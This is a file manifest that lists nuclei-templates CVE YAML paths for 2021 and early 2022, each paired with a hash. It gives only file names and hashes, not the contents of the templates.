+nuclei-templates/cves/2021/CVE-2021-25028.yaml:722cc3e4e0e6be6d4dd270de016a969d5854afe2 +nuclei-templates/cves/2021/CVE-2021-25033.yaml:0411f23b2f67f9f2f6029b55755b407d0deb6db9 +nuclei-templates/cves/2021/CVE-2021-25052.yaml:59dff1abdea7bf28993d80b9292a8a4f24975186 +nuclei-templates/cves/2021/CVE-2021-25055.yaml:58a899f23b5e7bb8d95a65fd7d96e79797c20014 +nuclei-templates/cves/2021/CVE-2021-25063.yaml:2697f05ed1aff5ff6fabd5f567a29f8af167607d +nuclei-templates/cves/2021/CVE-2021-25074.yaml:2f0c75df6f945983744f7cd566c1f02bfdb67452 +nuclei-templates/cves/2021/CVE-2021-25075.yaml:37f48aa1ed9f68bcf15679eb539548b4ac4e44f8 +nuclei-templates/cves/2021/CVE-2021-25085.yaml:b8b7e2eff5e5e7596c31c5d29b871f355b11d21b +nuclei-templates/cves/2021/CVE-2021-25104.yaml:3e5114fef92c54b93dbfd4431d9dc13ac3f993ee +nuclei-templates/cves/2021/CVE-2021-25111.yaml:983bfa4420f0a5e8eb72b44c4bc0915d62b9ff83 +nuclei-templates/cves/2021/CVE-2021-25112.yaml:dd8fe693fc1e69f45acaad0f4342b00c1177c740 +nuclei-templates/cves/2021/CVE-2021-25118.yaml:ae80b3e427638ddf3ed3d1ad73ae0fd92a7794c8 +nuclei-templates/cves/2021/CVE-2021-25120.yaml:d030ff9e5752cd5fa2a399a9339b20f5ca442661 +nuclei-templates/cves/2021/CVE-2021-25281.yaml:4365657f8d021220dd715ac1e506202fa1a5058e +nuclei-templates/cves/2021/CVE-2021-25646.yaml:e13906e2bde94eb9c3a98156f5c8bfbf46a44286 +nuclei-templates/cves/2021/CVE-2021-25864.yaml:6e3e674c1d9f45bbab9f2a7e4368116b2cf6a1dd +nuclei-templates/cves/2021/CVE-2021-26084.yaml:9158a28537d797f857edcc51f56fb2b820cbadef +nuclei-templates/cves/2021/CVE-2021-26085.yaml:3007627b7bf960d08a7b43ab90cc7bee3d815937 +nuclei-templates/cves/2021/CVE-2021-26086.yaml:1393d8f03e86804ea902cee2d67bc9317b83ab5f +nuclei-templates/cves/2021/CVE-2021-26247.yaml:1b5cc6fcda37a24d07c163d5c7cff0c37d76e6ca +nuclei-templates/cves/2021/CVE-2021-26295.yaml:ace56822f385d0076c6da618d969c0a4da0ee737 +nuclei-templates/cves/2021/CVE-2021-26475.yaml:4341727960c0686ca68c89592c5bb9a8cc02a560 +nuclei-templates/cves/2021/CVE-2021-26598.yaml:a910b8f883b754431a709178f2155ca783dabf90 +nuclei-templates/cves/2021/CVE-2021-26702.yaml:cb3809f04a40298e1ee3c69b9ed9c16c6dead9bf +nuclei-templates/cves/2021/CVE-2021-26710.yaml:db74ec26aff52e99d061c0d54fb6a953593ccd40 +nuclei-templates/cves/2021/CVE-2021-26723.yaml:c177e06b13dc063a376a5f3064d1b2f4ed6f813a +nuclei-templates/cves/2021/CVE-2021-26812.yaml:015117f846443c0debb4cb2aac356615db2e3176 +nuclei-templates/cves/2021/CVE-2021-26855.yaml:c8b69c9ca8c1ca7acf1b2f4b6e76105ad9aa774a +nuclei-templates/cves/2021/CVE-2021-27132.yaml:763eb1811e7da0ecde7327b8a39a158da0ff89f4 +nuclei-templates/cves/2021/CVE-2021-27309.yaml:348eb3779b282a32a1d3d7120139ff77d8f38053 +nuclei-templates/cves/2021/CVE-2021-27310.yaml:12253b4d2ce51798f1c411ece37912f256ea32ac +nuclei-templates/cves/2021/CVE-2021-27330.yaml:e817db4b3b8c65b1c7765e840d0616ae7d425b73 +nuclei-templates/cves/2021/CVE-2021-27358.yaml:8501019826546561839b6a6b5f233e74eeaa0960 +nuclei-templates/cves/2021/CVE-2021-27519.yaml:9695a5175cdb6f4c298639e2f4ac1e4723b73f48 +nuclei-templates/cves/2021/CVE-2021-27561.yaml:b8958e8eef8e815ec82ac212271f22dbe1d500b9 +nuclei-templates/cves/2021/CVE-2021-27651.yaml:fba1d3c41e330214a6a048f109874621a12d3759 +nuclei-templates/cves/2021/CVE-2021-27748.yaml:e0f3eb00e39e8d086c248e23774aed55136c2225 +nuclei-templates/cves/2021/CVE-2021-27850.yaml:2236fbc301d464c08fa6c8c44f280784dc107a54 +nuclei-templates/cves/2021/CVE-2021-27905.yaml:a44c8fe650ec233d9001beb83a0b931c9a9a1919 +nuclei-templates/cves/2021/CVE-2021-27909.yaml:3b3711ff6ab2da78344a9b24e63c39d126aa9968 +nuclei-templates/cves/2021/CVE-2021-27931.yaml:6abaf092407b4b1e48aeb3a90ffe7b7df6ed2b34 +nuclei-templates/cves/2021/CVE-2021-28073.yaml:58c9c67a95ea9d1f4af8f716bfd213658072a59d +nuclei-templates/cves/2021/CVE-2021-28149.yaml:7b941002dd20799a02a8e57ca577b7278f786864 +nuclei-templates/cves/2021/CVE-2021-28150.yaml:ffad30e631171d55784b853195c7351ff18e0de8 +nuclei-templates/cves/2021/CVE-2021-28151.yaml:e015012c36cbb80f1a19babae37b14a726b50a8a +nuclei-templates/cves/2021/CVE-2021-28164.yaml:bbb41155c2d74ac6848ec2254426608daec23704 +nuclei-templates/cves/2021/CVE-2021-28169.yaml:38b155ca4575499108b9c86019fbe59b85b2c0f4 +nuclei-templates/cves/2021/CVE-2021-28377.yaml:9b89848db15699517dd7e9c2e2e947c1b1021251 +nuclei-templates/cves/2021/CVE-2021-28854.yaml:2b20a7bdceeba8ea766a3beedc89a20390d46571 +nuclei-templates/cves/2021/CVE-2021-28918.yaml:a7cf145d92e5bba8d1826e983ee7d6fe845e5563 +nuclei-templates/cves/2021/CVE-2021-28937.yaml:88e1934a6603f8d9747778484b8f85e8a1d5ca0c +nuclei-templates/cves/2021/CVE-2021-29156.yaml:c225b779a2e30e5b5e906529b02a96101b4deccf +nuclei-templates/cves/2021/CVE-2021-29203.yaml:ddc113036586ddfc0047f496e144c56394c8eda3 +nuclei-templates/cves/2021/CVE-2021-29441.yaml:da9a25f6cedf057a53f9318d25507c1b05012492 +nuclei-templates/cves/2021/CVE-2021-29442.yaml:ee6f402837662de09ca17b054145faf37cad9299 +nuclei-templates/cves/2021/CVE-2021-29484.yaml:0ca7710b03f13ab639537956b1cff05ab4f090e9 +nuclei-templates/cves/2021/CVE-2021-29490.yaml:377486a6cef1288b22a7d53b56df8462e265bbde +nuclei-templates/cves/2021/CVE-2021-29622.yaml:74c10386c9414063c642dae8be841648ac6536b4 +nuclei-templates/cves/2021/CVE-2021-29625.yaml:2c2c0d7fc6dd44c6e016d47c808bd8e1b9c8d6dc +nuclei-templates/cves/2021/CVE-2021-3002.yaml:b0281c085482ff720ad2be1ac12acd2436bb0fda +nuclei-templates/cves/2021/CVE-2021-30049.yaml:372ff0fada4181a7d3835b6213c0f77047902778 +nuclei-templates/cves/2021/CVE-2021-30151.yaml:15302e28773d0b35519f169a71e896e72e6bcaa4 +nuclei-templates/cves/2021/CVE-2021-3017.yaml:c4c3c0772bbcacd8da934298f3c0a0e92874ba36 +nuclei-templates/cves/2021/CVE-2021-3019.yaml:2c3638d15a3313f50b88a3d83042d3987975a25e +nuclei-templates/cves/2021/CVE-2021-30213.yaml:a50bcdf02d136ae16762936f6bca56d769724626 +nuclei-templates/cves/2021/CVE-2021-30461.yaml:eaf692ef973990b0c209f11f2ca3264cbf9c6310 +nuclei-templates/cves/2021/CVE-2021-30497.yaml:799044bc1649c218869ce9a7c834472bab8b6e7f +nuclei-templates/cves/2021/CVE-2021-3110.yaml:2eb913ebea193ecd237f4ecadbae18f881079d57 +nuclei-templates/cves/2021/CVE-2021-31249.yaml:e8fdf92acffa785cc8da34f434e31e1955a08b20 +nuclei-templates/cves/2021/CVE-2021-31250.yaml:aed3492accd323d464de2684ead73d5734c19af0 +nuclei-templates/cves/2021/CVE-2021-3129.yaml:b5382d34cdbb308370ed6a1cf1d6b3073a72271f +nuclei-templates/cves/2021/CVE-2021-31537.yaml:fe6ab81ed7b9f0669e041ed0fb02a1ee5964ea7d +nuclei-templates/cves/2021/CVE-2021-31581.yaml:499124a72ecbd8839b23d214bf5f93d32b950359 +nuclei-templates/cves/2021/CVE-2021-31589.yaml:737d1303744687ddfc0fb0c412c5f4d30c666ea6 +nuclei-templates/cves/2021/CVE-2021-31602.yaml:c47686b9151c34b68600b5dfef1af6e2f682b4af +nuclei-templates/cves/2021/CVE-2021-31682.yaml:38dfd821d91f8b76b2250a2a96bf1e858c990c25 +nuclei-templates/cves/2021/CVE-2021-31755.yaml:243966c3414afddb428385268f2ee9c4921d2a8e +nuclei-templates/cves/2021/CVE-2021-31805.yaml:764e81a6abd5bfa8df47c4da716bdf371956ead9 +nuclei-templates/cves/2021/CVE-2021-31856.yaml:1e542045d341daff9dcb84ffb8f2b49d162ebc3a +nuclei-templates/cves/2021/CVE-2021-31862.yaml:33e4492f0a006c85facadbb1e06806ff024acfed +nuclei-templates/cves/2021/CVE-2021-32030.yaml:9adbbc085d4cd26db95561cf5c1703a348bac7b2 +nuclei-templates/cves/2021/CVE-2021-32172.yaml:0e346d215574ffbc17a5ac9ad0c99e7531b3ba7d +nuclei-templates/cves/2021/CVE-2021-3223.yaml:71c2e581c8398db44eade1ddac7d447a2f0f5f2f +nuclei-templates/cves/2021/CVE-2021-32305.yaml:2b7b363ba5248f082057135e0dbccf14451304f1 +nuclei-templates/cves/2021/CVE-2021-32618.yaml:3ec77d6bc37ddb7c9346f8bcb240ef815b66f146 +nuclei-templates/cves/2021/CVE-2021-32682.yaml:b32a2903e2d22bad962711da3f66587b8bda0b5c +nuclei-templates/cves/2021/CVE-2021-32789.yaml:bedf7c3d58092731df6f3ef1d98b0f386757ab46 +nuclei-templates/cves/2021/CVE-2021-32819.yaml:50b4b91025463fa53a506049f60c788ef6450170 +nuclei-templates/cves/2021/CVE-2021-32820.yaml:4f59784c977eb301e894467019dd0acd0a4e2ab6 +nuclei-templates/cves/2021/CVE-2021-32853.yaml:b9f9fb9e112235e56347a1d1d8b874edb5702043 +nuclei-templates/cves/2021/CVE-2021-3293.yaml:1fc54e5e0c888d305c0adb7d0dee96f060e233cb +nuclei-templates/cves/2021/CVE-2021-3297.yaml:c03758e73140994a47e975adfb26963767c35aba +nuclei-templates/cves/2021/CVE-2021-33044.yaml:30d20ef309b3ddb76bddd605cf85eda75fc2df11 +nuclei-templates/cves/2021/CVE-2021-33221.yaml:98e7470db0f8a094775c69fcc2e509c327ead411 +nuclei-templates/cves/2021/CVE-2021-33357.yaml:57049a3f9d0b48d10ea0384414fd6565cd6a2e61 +nuclei-templates/cves/2021/CVE-2021-33544.yaml:c5208461c0cd48bf2d79faa56ae32e73c04cabc2 +nuclei-templates/cves/2021/CVE-2021-33564.yaml:9447095aa3d3af6fa8bf835caf8208c0116fb8a6 +nuclei-templates/cves/2021/CVE-2021-3374.yaml:e51b36e5b693da6f9909b15c15f5f401ac5ad079 +nuclei-templates/cves/2021/CVE-2021-3377.yaml:3eb3cc29f74a16d8ebbe45b5f263e3bd8451037f +nuclei-templates/cves/2021/CVE-2021-3378.yaml:11ca956c5773a44bc9c3ce0f837e8c4948e590d4 +nuclei-templates/cves/2021/CVE-2021-33807.yaml:c0a501ba5b9200488c467744ebebb25b6d9f197e +nuclei-templates/cves/2021/CVE-2021-33851.yaml:4d87a5ce50aeb45109fc16956e2732b0d00ea243 +nuclei-templates/cves/2021/CVE-2021-33904.yaml:ba0a99539b817aa9d2b37053905d78d099a60ef8 +nuclei-templates/cves/2021/CVE-2021-34370.yaml:a32e95a9ec45760b88677bbe1a4b9675289140ad +nuclei-templates/cves/2021/CVE-2021-34429.yaml:d3a4afd4e8e64f569f7cf4ccc0e665a74665aec1 +nuclei-templates/cves/2021/CVE-2021-34473.yaml:79a75a75805f41eab1c6aae96cd874152b3bddb1 +nuclei-templates/cves/2021/CVE-2021-34621.yaml:5a83b49fb13d5cd8da56731897971e645e160e02 +nuclei-templates/cves/2021/CVE-2021-34640.yaml:d42b422e2304fdc3b6cf7fe3dd34cde4a3bad13e +nuclei-templates/cves/2021/CVE-2021-34643.yaml:dfa90f74875669db2b3817f0b0dfcc204d2d4b1a +nuclei-templates/cves/2021/CVE-2021-34805.yaml:9700462801fe4fded421b85a42ed17ced3ef091d +nuclei-templates/cves/2021/CVE-2021-35265.yaml:8a130bfa6ffa1bdc9584a72159cc293dcc6dbd42 +nuclei-templates/cves/2021/CVE-2021-35336.yaml:9210c944b7ad46229d214e08bbb777c8d56b677d +nuclei-templates/cves/2021/CVE-2021-35380.yaml:fd49fd8fc3d6ea09bcac849d1d0509ba1195f13c +nuclei-templates/cves/2021/CVE-2021-35464.yaml:eafee54f62f2035d3f7580091d3cb422650ae66a +nuclei-templates/cves/2021/CVE-2021-35488.yaml:6d33b0692f217c0f353787d77a4385e19bb23bc2 +nuclei-templates/cves/2021/CVE-2021-35587.yaml:1f409e37b4398841f24d5d4fa72c50a4b8a36a2b +nuclei-templates/cves/2021/CVE-2021-3577.yaml:34f7f6ecf1e37261fdff9f829eb66ca2d282772b +nuclei-templates/cves/2021/CVE-2021-36260.yaml:49e230af23acb4b8c0a70e8e5e29dc6512ff585a +nuclei-templates/cves/2021/CVE-2021-36356.yaml:b93e1cb0d02a577f7973451784299a516c1f0db5 +nuclei-templates/cves/2021/CVE-2021-36380.yaml:ea839289dd4b6030e0ef761fe4ef3538fbded769 +nuclei-templates/cves/2021/CVE-2021-36450.yaml:78167d1da9b53362bfd3c19d766f3e7c0554e201 +nuclei-templates/cves/2021/CVE-2021-3654.yaml:56bd4505148bdd926d0ac51b7915391aa5082882 +nuclei-templates/cves/2021/CVE-2021-36748.yaml:dc19dc137cd19b6fe1e4e97ebeff9ec489ea576f +nuclei-templates/cves/2021/CVE-2021-36749.yaml:5c48895640fcf9bc4a74a705c2afa46c4e2bd3b1 +nuclei-templates/cves/2021/CVE-2021-36873.yaml:a9d8ba3f4c26214ff1626d611e7703cf8e3e94df +nuclei-templates/cves/2021/CVE-2021-37216.yaml:7d57ebdca95cbf6bf4539a3ce8a61665c42e654f +nuclei-templates/cves/2021/CVE-2021-37416.yaml:8833adbc9968a297815f3750847e44d4c3a229dd +nuclei-templates/cves/2021/CVE-2021-37538.yaml:08518d71d84c11eb573b91d882a099d8b07c654b +nuclei-templates/cves/2021/CVE-2021-37573.yaml:403eee83e0cc703069464be3b304b592dc541b00 +nuclei-templates/cves/2021/CVE-2021-37580.yaml:8946d51c1fbe274b74f07bf0d1aa9fa1ca12a583 +nuclei-templates/cves/2021/CVE-2021-37589.yaml:c616b4b9126a0b2081d525c496ddfa6b50a53e83 +nuclei-templates/cves/2021/CVE-2021-37704.yaml:4421629e409e8a43711dc9926937b222259b3f44 +nuclei-templates/cves/2021/CVE-2021-37833.yaml:1ba8539950e7302728036f9a109fdc3d57f4071f +nuclei-templates/cves/2021/CVE-2021-38314.yaml:b018c6b21f4d2941ecbd40e450fd68c5ab280a78 +nuclei-templates/cves/2021/CVE-2021-38540.yaml:11179d76d920c7fc958e4a187217400f92acc1b4 +nuclei-templates/cves/2021/CVE-2021-38647.yaml:5fd0f17a16a6512134a451e33a9a0297ff2156b0 +nuclei-templates/cves/2021/CVE-2021-38702.yaml:62481ab918a15ba9fdaef0e624f69269ff6add87 +nuclei-templates/cves/2021/CVE-2021-38704.yaml:b91ce5c4ecea718d4beca9f14ad6befec1e32311 +nuclei-templates/cves/2021/CVE-2021-38751.yaml:2d41445eb3a13a3d22ee8cb8dbdb790e6477f8fc +nuclei-templates/cves/2021/CVE-2021-39211.yaml:a3d632fa24b09e56f22af8144cc1b2324653e029 +nuclei-templates/cves/2021/CVE-2021-39226.yaml:150e8507245989a77593e8a43c5a2227436f1e72 +nuclei-templates/cves/2021/CVE-2021-39312.yaml:8c7344fa64196fd3a69f0a391c99c9f99a84df59 +nuclei-templates/cves/2021/CVE-2021-39316.yaml:e0a11f627aaa547cc5f929f4e08dd38fe83b6d2b +nuclei-templates/cves/2021/CVE-2021-39320.yaml:f7c84c88e4a162e096a2413883fcce9ac5902bd4 +nuclei-templates/cves/2021/CVE-2021-39322.yaml:865411bc791d18fc0efbf615c108f4e8e6f925f5 +nuclei-templates/cves/2021/CVE-2021-39327.yaml:cdd3bfa37be8e6789f9724efe8293da44d545789 +nuclei-templates/cves/2021/CVE-2021-39350.yaml:058434a2714651c0b89d6000f29312c4fe1458b4 +nuclei-templates/cves/2021/CVE-2021-39433.yaml:1241a7e92903a51adfe4ae2e997639559cba2432 +nuclei-templates/cves/2021/CVE-2021-39501.yaml:11ee441b331c0850f3372b798ac4adc30e1b8da9 +nuclei-templates/cves/2021/CVE-2021-40149.yaml:047f28e83c736a7779d664912887984555a6dae5 +nuclei-templates/cves/2021/CVE-2021-40150.yaml:4e4efb6962212b577bf1d897972d6e784ed33ab8 +nuclei-templates/cves/2021/CVE-2021-40323.yaml:c3057676feae548b572b35db0a769e19f76a2bec +nuclei-templates/cves/2021/CVE-2021-40438.yaml:0bb6eb10e8879b9925f328118cbba5c0de660d68 +nuclei-templates/cves/2021/CVE-2021-40539.yaml:b7a39cdf610a0f5037e506544f61a36532e8b52f +nuclei-templates/cves/2021/CVE-2021-40542.yaml:206c836b52b5e53b82ae0278109070add582bfd9 +nuclei-templates/cves/2021/CVE-2021-40661.yaml:11d70f3454a75f8acf260afbb6140ec9bdea1858 +nuclei-templates/cves/2021/CVE-2021-40822.yaml:a201b59a5c6eded5510eb8ff87b4f6b9e632bb3f +nuclei-templates/cves/2021/CVE-2021-40856.yaml:c9c9d98ff2d0a9c5beafbd2c55f0cd7b2bc61b1d +nuclei-templates/cves/2021/CVE-2021-40859.yaml:eec19041edab1095976818afe987dc0e56516ab6 +nuclei-templates/cves/2021/CVE-2021-40868.yaml:dbfadc27883e2adb97d900003c8f9fea44e65699 +nuclei-templates/cves/2021/CVE-2021-40870.yaml:c470ea01673e228e53adfc281aadc4e2235dd87c +nuclei-templates/cves/2021/CVE-2021-40875.yaml:a1ebec565fc3f9dd5add1db72ef362e9d8a9a468 +nuclei-templates/cves/2021/CVE-2021-40960.yaml:08673ea63c23af42a8e00789eadf914704ff08ba +nuclei-templates/cves/2021/CVE-2021-40978.yaml:b5d386778bdaf5d3234ca4f34c752f3fc8e676c8 +nuclei-templates/cves/2021/CVE-2021-41174.yaml:108dc617c7dab716dd59d84243d250fb55723cc2 +nuclei-templates/cves/2021/CVE-2021-41192.yaml:b87bb86c546c155307a2580c50689d68053860e9 +nuclei-templates/cves/2021/CVE-2021-41266.yaml:5739c1409f9a894a803058369bcfd712fb94dd40 +nuclei-templates/cves/2021/CVE-2021-41277.yaml:019f63460c0edaeae383986664a1265f3a680b60 +nuclei-templates/cves/2021/CVE-2021-41282.yaml:e0ec2899e305986da2364d0e4d85fdacda4753fa +nuclei-templates/cves/2021/CVE-2021-41291.yaml:107e25ba6125d8c071a19314082c7e1265dc1544 +nuclei-templates/cves/2021/CVE-2021-41293.yaml:cccb01e4d5db64b484487bc0633668dd18fc9242 +nuclei-templates/cves/2021/CVE-2021-41349.yaml:d86deaf144cf0b2159e901062e67544eba05f9d6 +nuclei-templates/cves/2021/CVE-2021-41381.yaml:edccb97e6254705caf4be130d76922caa8a17165 +nuclei-templates/cves/2021/CVE-2021-41432.yaml:1a2ee4b828c639975646cc3f3aed6ed9856c9f1b +nuclei-templates/cves/2021/CVE-2021-41467.yaml:d64ce4b0b58ff32490d95373d2d2f4b5b5ddda89 +nuclei-templates/cves/2021/CVE-2021-41569.yaml:b87a919c7d43e3474aff3ccf2582ccedfe6ec4b9 +nuclei-templates/cves/2021/CVE-2021-41648.yaml:1875a729ed89311dd56c6e179f6e54dc485107be +nuclei-templates/cves/2021/CVE-2021-41649.yaml:572f1ea2a0c1a29ae009d78035cac83457413f17 +nuclei-templates/cves/2021/CVE-2021-41653.yaml:4fe5e6eff5321d071fbca1e17a9ce9f47aeb6c42 +nuclei-templates/cves/2021/CVE-2021-41691.yaml:3f300a0de3444f89cf38689b6e53bdf2b5380285 +nuclei-templates/cves/2021/CVE-2021-41773.yaml:0325a03e8034912435659f3593ebfbee41671739 +nuclei-templates/cves/2021/CVE-2021-41826.yaml:4c98f9d6359cf046c10167ee9614814747b937f3 +nuclei-templates/cves/2021/CVE-2021-41878.yaml:8b1b9641efa4a58e2168d89be1cbb71422962259 +nuclei-templates/cves/2021/CVE-2021-4191.yaml:ebdd12180340d32ecb34570ad5cc251aca8a4194 +nuclei-templates/cves/2021/CVE-2021-41951.yaml:132b54d4957de6b9d892ea3b81ff1b962bd602c1 +nuclei-templates/cves/2021/CVE-2021-42013.yaml:50ce7652b5c06a28fb860f330bc553ab64857613 +nuclei-templates/cves/2021/CVE-2021-42063.yaml:9070c9f628aedab04bef8c6e457d6002813325f4 +nuclei-templates/cves/2021/CVE-2021-42071.yaml:4050ee5b75c898bd33bfbe745fc6803725dfd964 +nuclei-templates/cves/2021/CVE-2021-42192.yaml:a94b9f81698c3a2d15df39d7e21c39b28131d798 +nuclei-templates/cves/2021/CVE-2021-42237.yaml:c572811b9b17a52fe1b0e1648ffe8b4e19b1f26e +nuclei-templates/cves/2021/CVE-2021-42258.yaml:9c3710370eaccb77bdce3642b05a281a82806228 +nuclei-templates/cves/2021/CVE-2021-42551.yaml:49b8d116d0aa9601bda76579bd2e6c9a8db324dd +nuclei-templates/cves/2021/CVE-2021-42565.yaml:a1b88e52ecd32448d27878b2e1fb891e72e92b6a +nuclei-templates/cves/2021/CVE-2021-42566.yaml:3f01dad769422258470bccdaa0f7b46617ffe68e +nuclei-templates/cves/2021/CVE-2021-42567.yaml:d085501f117ec7da71be23a66e3624f11ca1488b +nuclei-templates/cves/2021/CVE-2021-42627.yaml:c4f41bd4165a12c1c93cd36fc200c735e7bedf12 +nuclei-templates/cves/2021/CVE-2021-42663.yaml:04b939930b802c6f82e7809d35eb13313736ed25 +nuclei-templates/cves/2021/CVE-2021-42667.yaml:065fa9d90bb4f7f6bc44cdcff3a84a56a80ff341 +nuclei-templates/cves/2021/CVE-2021-43062.yaml:bae23ce3c999bf0442a55d8dfc467b49383df99f +nuclei-templates/cves/2021/CVE-2021-43287.yaml:5a695b30432d0253fc256792b6f012e987886416 +nuclei-templates/cves/2021/CVE-2021-43421.yaml:208b6243dbbb2f17099d884212f1630cea37f52f +nuclei-templates/cves/2021/CVE-2021-43495.yaml:e200b63b6e506174c2d1caa9fd42aeca57205c2c +nuclei-templates/cves/2021/CVE-2021-43496.yaml:9aba14276cfc695257cea105defbec6daf44f713 +nuclei-templates/cves/2021/CVE-2021-43510.yaml:0d730042494f747f70117070d1b16ab6e80b5bfd +nuclei-templates/cves/2021/CVE-2021-43574.yaml:7d96c51cb791d17d5b7542b3064544de2d303d15 +nuclei-templates/cves/2021/CVE-2021-43734.yaml:bd53246c425d6a7cfe4e7b2d4694fcbb4075bcde +nuclei-templates/cves/2021/CVE-2021-43778.yaml:96512586b759ca48602d8922f7a61180c3d74dad +nuclei-templates/cves/2021/CVE-2021-43798.yaml:b2e4c2a254d45ce4e3bc6431f25056f630892771 +nuclei-templates/cves/2021/CVE-2021-43810.yaml:2aefce410f03d12d749e7c385e44538e33a53e01 +nuclei-templates/cves/2021/CVE-2021-44077.yaml:ad24744990a4c1ebf78ead7faafee83a5b45e7a8 +nuclei-templates/cves/2021/CVE-2021-44152.yaml:d659dfe11b5e76b47dd810ea00eccb8a6d2e300f +nuclei-templates/cves/2021/CVE-2021-44228.yaml:c1270cbd102deab5398691cb87d86fd99b938865 +nuclei-templates/cves/2021/CVE-2021-44427.yaml:648e1bcca901f01043a93044bec4f4feeb5ba6de +nuclei-templates/cves/2021/CVE-2021-44451.yaml:aaa5caa1283c7bab90bd542c27349055399e2b11 +nuclei-templates/cves/2021/CVE-2021-44515.yaml:9157869f220a085f6411f70c60023f8f8e653e58 +nuclei-templates/cves/2021/CVE-2021-44521.yaml:564a9d0a5563cf949a0c79045bc46f8a017309e7 +nuclei-templates/cves/2021/CVE-2021-44528.yaml:551c71790e67f769dceb028aaa81ca9e8a3ba6cc +nuclei-templates/cves/2021/CVE-2021-44529.yaml:5af6b3741032af3cc10a1672910f1ace6d2532e1 +nuclei-templates/cves/2021/CVE-2021-44848.yaml:1a1fceeba2d1c507f82ae678f2ed6bd5e18863e2 +nuclei-templates/cves/2021/CVE-2021-45043.yaml:1d4ef5e0d3097ff715d6067b2fa6f9faf3bf78e8 +nuclei-templates/cves/2021/CVE-2021-45046.yaml:75df583aba77a7e539b87f09edd2ad816478c334 +nuclei-templates/cves/2021/CVE-2021-45092.yaml:e9fd05b61578c388d2d7d7cedde992d4eedc1eed +nuclei-templates/cves/2021/CVE-2021-45232.yaml:045efddc26b99515d5f3c6e0859fcda53ee4b92d +nuclei-templates/cves/2021/CVE-2021-45380.yaml:5fc48f58317676e0510bca2b0c517bef50a6e647 +nuclei-templates/cves/2021/CVE-2021-45422.yaml:5255c18d62455cd5310fa4331efa501482d4f0bc +nuclei-templates/cves/2021/CVE-2021-45428.yaml:a4967e7869c72e1dd4dfcf28b9f083135d6c8145 +nuclei-templates/cves/2021/CVE-2021-45967.yaml:cbd8dcc9a962253ef616f9d5bc6b5526ffff08a2 +nuclei-templates/cves/2021/CVE-2021-45968.yaml:b733301653dccd94c37209f638fc80ff65d55290 +nuclei-templates/cves/2021/CVE-2021-46005.yaml:134e88d6e0a8253a5310e3d967f850034c5921a5 +nuclei-templates/cves/2021/CVE-2021-46068.yaml:8332afd87e359471f08410f2d8e5b889afa612c0 +nuclei-templates/cves/2021/CVE-2021-46069.yaml:35902760f0fd4bf59d90fde1c9b53c8efe438360 +nuclei-templates/cves/2021/CVE-2021-46071.yaml:cf858694c6a488666163f369cea610e9d4de5688 +nuclei-templates/cves/2021/CVE-2021-46072.yaml:3bee2e13ecb716d234cc7bcbc58485f708029e79 +nuclei-templates/cves/2021/CVE-2021-46073.yaml:a19e02d9d39b3725701e59b55d21a11f0dd580ab +nuclei-templates/cves/2021/CVE-2021-46379.yaml:3efa9f8958c0bd72ba6c081322d7d623e71a9093 +nuclei-templates/cves/2021/CVE-2021-46381.yaml:50544f3317d081597dadb2d13dd99df72f2439df +nuclei-templates/cves/2021/CVE-2021-46387.yaml:e1a73b03a9fb32564d83c83f3098dc5af9728e2f +nuclei-templates/cves/2021/CVE-2021-46417.yaml:7959f7d0d878bd9aee9335a13d15ad4aa6a02145 +nuclei-templates/cves/2021/CVE-2021-46422.yaml:10c840a1aaab6662718767df7bd3267c8aa74f80 +nuclei-templates/cves/2021/CVE-2021-46424.yaml:268a39fa3d571eeb3a7c04f8ea4ea787877931dc +nuclei-templates/cves/2022/CVE-2022-0140.yaml:b5a397c406d677700ba6b0fc1d7fa089a80f20ed +nuclei-templates/cves/2022/CVE-2022-0147.yaml:06a33430b599f970ef5b474d3ba965cf8d002b05 +nuclei-templates/cves/2022/CVE-2022-0148.yaml:c66a51e1a192b091fca2e4ab7028d0a03f4c8748 +nuclei-templates/cves/2022/CVE-2022-0149.yaml:e880d0aa13a334facc8be91af367368f330e3733 +nuclei-templates/cves/2022/CVE-2022-0150.yaml:ce44b16ec2ef922cdd924430c851cca10a27b957 +nuclei-templates/cves/2022/CVE-2022-0165.yaml:39cf15f45f1c53c7862435ad62b505b1196af14d +nuclei-templates/cves/2022/CVE-2022-0189.yaml:c986ae877ab15a59702a04ca2d26b93d281d3049 +nuclei-templates/cves/2022/CVE-2022-0201.yaml:605311e730f08f3b0cb0ca28cedeef2264cfcfd4 +nuclei-templates/cves/2022/CVE-2022-0208.yaml:78b133747b7b5b8817f1310baf4b1ae72477e81f +nuclei-templates/cves/2022/CVE-2022-0218.yaml:4b54e85202bf6fc7325143de20ce287cf92ea289 +nuclei-templates/cves/2022/CVE-2022-0220.yaml:fe1bae31a307e846e8e4411334a201aca9884ab2 +nuclei-templates/cves/2022/CVE-2022-0271.yaml:1b3f3ca9764a8c5bda274d836c3b33b288fd90d7 +nuclei-templates/cves/2022/CVE-2022-0281.yaml:f345fc94287b3601045ba25d295aece65f4eb30f +nuclei-templates/cves/2022/CVE-2022-0288.yaml:3e829d4f2309fff430cb8036bef69901e07e8a8b +nuclei-templates/cves/2022/CVE-2022-0346.yaml:cf3f76ae080ca78aaad1a2ed03fe4a7ae18474bb +nuclei-templates/cves/2022/CVE-2022-0349.yaml:e7d50f8918e164918de5ed1dcf9c8e64f1449684 +nuclei-templates/cves/2022/CVE-2022-0378.yaml:db6829d705f9d821789192ba10f69577068d4237 +nuclei-templates/cves/2022/CVE-2022-0381.yaml:879fe12e10bd114314f38722594754644daa3748 +nuclei-templates/cves/2022/CVE-2022-0412.yaml:8faf540fb72342ee09035a0ff48c70427302efab +nuclei-templates/cves/2022/CVE-2022-0422.yaml:656e20773fb561298bdfcb573dbcd078f370b5e3 +nuclei-templates/cves/2022/CVE-2022-0432.yaml:b80561c4711f71666fae3ec86770b1a50275ce51 +nuclei-templates/cves/2022/CVE-2022-0434.yaml:ff8c8b4c2caec9497fdfc183d093a31946cac242 +nuclei-templates/cves/2022/CVE-2022-0437.yaml:0c477ae8b36a5e543eba4d1d52d92f53a586ac6d +nuclei-templates/cves/2022/CVE-2022-0441.yaml:bbbe990ff0b5030049d65e993a834480dccb0244 +nuclei-templates/cves/2022/CVE-2022-0482.yaml:4fb06b0572f9ac69754545ff361de21710078066 +nuclei-templates/cves/2022/CVE-2022-0535.yaml:e4083a025c51ff91fcb3cfbfa14e0cb94b43f8d9 +nuclei-templates/cves/2022/CVE-2022-0540.yaml:48b7d53184804bd7f293dcff232aa57b6f84ec71 +nuclei-templates/cves/2022/CVE-2022-0543.yaml:1d3382f39a5de947c689dee3794b7396269e04ce 